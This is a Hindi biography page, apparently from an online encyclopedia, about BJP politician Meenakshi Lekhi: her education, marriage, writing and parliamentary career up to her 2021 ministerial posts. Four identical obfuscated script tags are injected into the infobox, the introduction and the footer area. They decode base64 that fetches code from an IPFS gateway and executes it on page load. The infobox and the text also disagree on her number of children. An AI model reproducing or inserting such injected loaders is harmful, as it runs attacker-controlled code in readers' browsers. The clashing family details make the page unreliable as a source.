मीनाक्षी लेखी
मीनाक्षी लेखी
| |
पूरा नाम | मीनाक्षी लेखी |
जन्म | 30 अप्रॅल, 1967 |
जन्म भूमि | नई दिल्ली, भारत |
पति/पत्नी | अमन लेखी |
संतान | दो |
नागरिकता | भारतीय |
प्रसिद्धि | राजनीतिज्ञ |
पार्टी | भारतीय जनता पार्टी |
पद | राज्य मंत्री, विदेश मंत्रालय- 7 जुलाई, 2021 से |
शिक्षा | बीएससी (वनस्पति विज्ञान), एलएलबी |
विद्यालय | हिंदू कॉलेज, दिल्ली विश्वविद्यालय |
अन्य जानकारी | मीनाक्षी लेखी साप्ताहिक पत्रिका 'फोर्थराइट' में एक पाक्षिक कॉलम लिखती है। उन्होंने टेलीविज़न शो और समाचार पत्रों में विभिन्न लेखों में कई मुद्दों पर बहस की है। |
अद्यतन | 16:36, 15 जुलाई 2021 (IST) <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>मीनाक्षी लेखी (अंग्रेज़ी: Meenakshi Lekhi, जन्म- 30 अप्रॅल, 1967, नई दिल्ली) भारतीय जनता पार्टी की राजनीतिज्ञ और सक्रिय राजनेता हैं। वे वर्तमान में नई दिल्ली लोकसभा निर्वाचन क्षेत्र का प्रतिनिधित्व कर रही हैं। मीनाक्षी लेखी को भाजपा के गतिशील और बहुमुखी चेहरे के रूप में जाना जाता है, क्योंकि वे भारतीय जनता पार्टी की राष्ट्रीय प्रवक्ता और भारत के सुप्रीम कोर्ट की वकील हैं। 7 जुलाई, 2021 को प्रधानमंत्री नरेन्द्र मोदी के मंत्रिमण्डल में विस्तार तथा फेरबदल के बाद मीनाक्षी लेखी को 'विदेश मंत्रालय में राज्य मंत्री' तथा 'संस्कृति मंत्रालय में राज्य मंत्री' बनाया गया है।
परिचय
मीनाक्षी लेखी का जन्म 30 अप्रैल, 1967 को नई दिल्ली में हुआ था। वह एक मध्यम वर्ग के परिवार से हैं। उन्होंने प्रतिष्ठित हिंदू कॉलेज, दिल्ली विश्वविद्यालय से वनस्पति विज्ञान में बीएससी किया है। बाद में एलएलबी किया। डीयू से उन्होंने 1990 में दिल्ली.बार काउंसिल में पंजीकरण करवाया। उनके ससुर स्वर्गीय प्राण नाथ लेखी सुप्रीम कोर्ट के वकील थे। वे अमन लेखी नामक सुप्रीम कोर्ट के वकील के साथ प्रेमसंबंध में बंध गईं। बार काउंसिल चुनाव में उम्मीदवार के लिए प्रचार करते हुए मीनाक्षी लेखी की अमन लेखी से मुलाकात हुई थी। इनका विवाह 11 अप्रैल, 1992 को हुआ। इस दंपत्ति के तीन बच्चे हैं।[1]
मीनाक्षी लेखी साप्ताहिक पत्रिका 'फोर्थराइट' में एक पाक्षिक कॉलम लिखती है। उन्होंने टेलीविज़न शो और समाचार पत्रों में विभिन्न लेखों में कई मुद्दों पर बहस की है। वे विभिन्न मंत्रालयों के साथ एनएचआरसी और लिंग प्रशिक्षण कार्यक्रमों में विभिन्न व्याख्यान ले रही है। वे "महिला आरक्षण विधेयक" और "कार्यस्थल पर यौन उत्पीड़न की समस्या" की मसौदा समिति का सदस्य भी रही हैं।
राजनीतिक घटनाक्रम
- 2014 - मीनाक्षी लेखी को नई दिल्ली निर्वाचन क्षेत्र से 16वीं लोकसभा में चुना गया। उन्होंने आप के आशीष खेतान को हराया था।
- 2010 - मीनाक्षी लेखी आरएसएस से जुड़े संगठन, स्वदेशी जागरण मंच के साथ काम कर रही थीं। उस दौरान पूर्व भाजपा अध्यक्ष नितिन गडकरी ने उन्हें भाजपा में शामिल होने के लिए आमंत्रित किया था। मीनाक्षी लेखी ने प्रस्ताव स्वीकार कर लिया और भाजपा की महिला मोर्चा (महिला विंग) में शामिल हो गईं। जल्द ही वे राष्ट्रीय उपाध्यक्ष, बीजेपी महिला मोर्चा बन गईं।[1]
- 20 जुलाई, 2016 - वे विशेषाधिकार समिति की अध्यक्ष बनीं।
- 12 जून, 2014 - उन्हें सदन समिति के सदस्य के रूप में निर्वाचित किया गया।
- 11 दिसंबर, 2014 के बाद वे लाभ के कार्यालयों संबंधी संयुक्त समिति की सदस्य बनीं।
|
|
|
|
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
टीका टिप्पणी और संदर्भ
- ↑ 1.0 1.1 मीनाक्षी लेखी जीवनी (हिंदी) hindi.oneindia.com। अभिगमन तिथि: 15 जुलाई, 2021।
संबंधित लेख
नरेन्द्र मोदी का कैबिनेट मंत्रिमण्डल
क्रमांक | मंत्री नाम | मंत्रालय |
---|